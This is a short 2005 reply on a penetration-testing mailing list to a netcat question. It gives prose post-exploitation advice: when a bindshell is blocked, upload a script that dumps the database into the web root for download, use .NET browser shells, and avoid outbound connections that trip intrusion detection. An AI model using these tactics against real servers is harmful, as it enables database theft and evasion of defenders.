Penetration Testing mailing list archives

RE: Netcat Question

From: Meidinger Chris <chris.meidinger () badenit de>
Date: Wed, 1 Jun 2005 15:43:39 +0200

Hi Intel,

I assume there is a firewall is between you and the webserver? That would be
a pretty logical explanation of why you can't access your bindshell.

If i were you, i would upload a script, have that script run locally to dump
the database and place the results in a folder in wwwroot. Then you can pick
it up with your browser.

If you want to get tricky, you should find a couple of .net applications
that act as browser shells.

But remember: unless you are combined testing incident response and
penetration you *don't* want to trip IDS. outbound connections from a web
server to a silly internet host on port 8000(!) are a dead giveaway for a
properly tuned IDS or a decent firewall admin. Don't be suprised if you get
blackholed.

Cheers,

Chris